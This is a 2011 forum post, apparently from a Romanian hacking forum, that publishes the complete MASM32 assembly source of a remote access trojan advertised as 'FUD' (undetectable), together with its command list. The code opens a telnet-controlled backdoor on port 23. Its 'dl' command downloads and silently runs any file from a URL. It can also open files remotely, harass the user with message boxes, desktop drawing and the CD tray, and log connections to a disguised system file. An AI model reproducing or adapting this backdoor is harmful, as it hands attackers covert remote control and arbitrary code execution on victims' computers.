DirectConnection Trojan

[sosetutza]

[FUD]

;Released 5/29/2011

;Connect via telnet to the ip of server on port 23

[Am pus doar sursa sa nu il poata folosi tot prostu]

Commands

Download and execute = dl <your url>

Open client file = Open <file path>

Send messagebox = box <your text>

Send GDI Desktop draw = msg <your text>

Open cd drive = cdopen

close cd drive = cdclose

Kill your connection = bye

Kill the server = kill

.486p
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\wsock32.inc
include \masm32\include\urlmon.inc
include \masm32\include\kernel32.inc
include \masm32\include\gdi32.inc
include \masm32\include\winmm.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\wsock32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\gdi32.lib
includelib \masm32\lib\winmm.lib

include \masm32\include\shell32.inc
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\urlmon.lib

.data
ClassName db "Remote Annoyance",0
AppName   db "Remote Annoyance",0
fname1    db "C:\Windows\win32parser.brk",0 
ftxt1     db "connected from : ",0

welcome   db "@RSTCenter.com",0


killed    db "You killed that poor Server..! ",13,10,0
thankz    db "bye.... ",13,10,0
gotit     db "ok..... ",0
errrr     db "error.. ",0
cm00      db "open",0
cm01      db "box",0
cm02      db "kill",0
cm03      db "bye",0
cm04      db "cd",0
file	  db "c:\windows\win32bitparser.exe",0
cm05      db "line",0
cm06      db "msg",0
cm07      db "dl",0
mci1      db "set cdaudio door open",0
mci2      db "set cdaudio door closed",0
mci3      db 0
buff      db 512 dup (0) 
buff2     db 512 dup (0)

.data?
s1        SOCKET ?
s2        SOCKET ?
sin1      sockaddr_in <>
sin2      sockaddr_in <>
wsaData   WSADATA <>
hFile     dd ?
fwritten  dd ?
temp      dd ?
deskdc    HDC ?



.code

start:
    invoke WSAStartup,0101h,ADDR wsaData
    invoke socket,PF_INET,SOCK_STREAM,0
    mov s1,eax
    mov ax,AF_INET
    mov sin1.sin_family,ax
    xor eax,eax
    mov sin1.sin_addr,eax
    invoke htons,23 ;Connection Port
    mov sin1.sin_port,ax
    invoke bind,s1,ADDR sin1,SIZEOF sockaddr_in
    cmp eax,SOCKET_ERROR
    jne @F
    invoke WSACleanup
    xor eax,eax
    call clrbuff
    ret
@@:
    invoke listen,s1,1
next_user:
    invoke closesocket,s2
    mov eax,SIZEOF sockaddr_in
    mov temp,eax
    invoke accept,s1,ADDR sin2,ADDR temp
    mov s2,eax
    invoke send,s2,ADDR welcome,SIZEOF welcome,0
    invoke CreateFile,ADDR fname1,GENERIC_WRITE,FILE_SHARE_READ,0,
                      OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
    mov hFile,eax
    invoke SetFilePointer,hFile,0,0,FILE_END
    mov eax,sin2.sin_addr ;get IP address of user
    invoke inet_ntoa,eax
    mov temp,eax
    mov edi,OFFSET buff2
    invoke lstrcpy,edi,ADDR ftxt1
    add edi,SIZEOF ftxt1
    invoke lstrcpy,edi,temp
    invoke lstrlen,temp
    add edi,eax
    mov eax,0a0d0000h
    mov [edi],eax
    add edi,4
    mov eax,edi
    sub eax,OFFSET buff2
    mov temp,eax          ; log new connection to C:\Server.log
    invoke WriteFile,hFile,ADDR buff2,eax,ADDR fwritten,0
    invoke send,s2,ADDR buff2,temp,0
    invoke send,s2,ADDR gotit,SIZEOF gotit,0
    invoke CloseHandle,hFile
next_command:
    mov edi,OFFSET buff
    mov eax,SIZEOF buff
    call clrbuff
    mov edi,OFFSET buff
crecv:
    invoke recv,s2,edi,500,0
    or eax,eax
    jz next_user
    cmp eax,SOCKET_ERROR
    je next_user
    add edi,eax
    mov al,[edi-1]
    cmp al,08h    
    jne @F
    xor eax,eax
    mov [edi],ax
    dec edi
    dec edi
@@:
    cmp al,0Ah
    jne crecv
    invoke CreateFile,ADDR fname1,GENERIC_WRITE,FILE_SHARE_READ,0,
                      OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
    mov hFile,eax   ; log commands to file C:\Server.log
    invoke SetFilePointer,hFile,0,0,FILE_END
    invoke lstrlen,ADDR buff
    invoke WriteFile,hFile,ADDR buff,eax,ADDR fwritten,0
    invoke CloseHandle,hFile


    invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm06
    invoke lstrcmpi,ADDR buff2,ADDR cm06
    or eax,eax
    jz dmsg
     invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm07
    invoke lstrcmpi,ADDR buff2,ADDR cm07
    or eax,eax
    jz download
    invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm05
    invoke lstrcmpi,ADDR buff2,ADDR cm05
    or eax,eax
    jz dline
    invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm04
    invoke lstrcmpi,ADDR buff2,ADDR cm04
    or eax,eax
    jz cdrom
    invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm03
    invoke lstrcmpi,ADDR buff2,ADDR cm03
    or eax,eax
    jz byebye
    invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm02
    invoke lstrcmpi,ADDR buff2,ADDR cm02
    or eax,eax
    jz killer
    invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm01
    invoke lstrcmpi,ADDR buff2,ADDR cm01
    or eax,eax
    jz msgbx
    invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm00
    invoke lstrcmpi,ADDR buff2,ADDR cm00
    or eax,eax
    jnz err

    invoke lstrlen,OFFSET buff
    mov edx,OFFSET buff
    xor ebx,ebx
    mov [edx+eax-2],ebx
    add edx,5
    invoke ShellExecute,NULL,ADDR cm00,edx,NULL,NULL,SW_SHOWNORMAL
    invoke send,s2,ADDR gotit,SIZEOF gotit,0
    jmp next_command

err:
    invoke send,s2,ADDR errrr,SIZEOF errrr,0
    jmp next_command




download:
	mov eax,OFFSET buff
	add eax,3
	Invoke URLDownloadToFile,0,eax,ADDR file,0,0
	Invoke WinExec, Addr file , SW_HIDE
	invoke send,s2,ADDR gotit,SIZEOF gotit,0
    jmp next_command

msgbx:
    mov eax,OFFSET buff
    add eax,3
    mov ebx,MB_OK
    or ebx,MB_TOPMOST
    or ebx,MB_SYSTEMMODAL
    or ebx,MB_ICONINFORMATION
    invoke MessageBox,NULL,eax,ADDR AppName,ebx
    invoke send,s2,ADDR gotit,SIZEOF gotit,0
    jmp next_command

dline:
    invoke GetDC,0 
    mov deskdc,eax
    invoke MoveToEx,deskdc,100,300,NULL
    invoke LineTo,deskdc,250,100 
    invoke LineTo,deskdc,550,400
    invoke LineTo,deskdc,600,430
    invoke ReleaseDC,0,deskdc
    invoke send,s2,ADDR gotit,SIZEOF gotit,0
    jmp next_command

dmsg:
    invoke GetDC,0
    mov deskdc,eax
    mov edx,36    
    mov [edi],edx
    invoke SelectObject,deskdc,eax
    invoke lstrlen,ADDR buff
    sub eax,3     
    sub eax,2     
    mov ecx,eax
    mov eax,OFFSET buff
    add eax,3
    invoke TextOut,deskdc,100,200,eax,ecx
    invoke ReleaseDC,0,deskdc
    invoke send,s2,ADDR gotit,SIZEOF gotit,0
    jmp next_command

cdrom:
    mov edi,OFFSET buff
    mov eax,[edi+2]
    cmp eax,"nepo" ;open or close
    je cdopen
    cmp eax,"solc"
    jne err

cdclose:
    invoke mciSendString,ADDR mci2,ADDR mci3,0,0
    invoke send,s2,ADDR gotit,SIZEOF gotit,0
    jmp next_command

cdopen:
    invoke mciSendString,ADDR mci1,ADDR mci3,0,0
    invoke send,s2,ADDR gotit,SIZEOF gotit,0
    jmp next_command

clrbuff:
    xor edx,edx
    mov [edi],edx
    add edi,4
    mov ebx,[edi]
    test ebx,ebx
    jnz clrbuff
    ret

byebye:
    invoke send,s2,ADDR thankz,SIZEOF thankz,0
    jmp next_user

killer:
    invoke send,s2,ADDR killed,SIZEOF killed,0
    invoke closesocket,s1
    invoke closesocket,s2
    invoke WSACleanup
    xor eax,eax
    ret

end start

Edited June 13, 2011 by sosetutza

[doareu]

unu' din prosti iti multumeste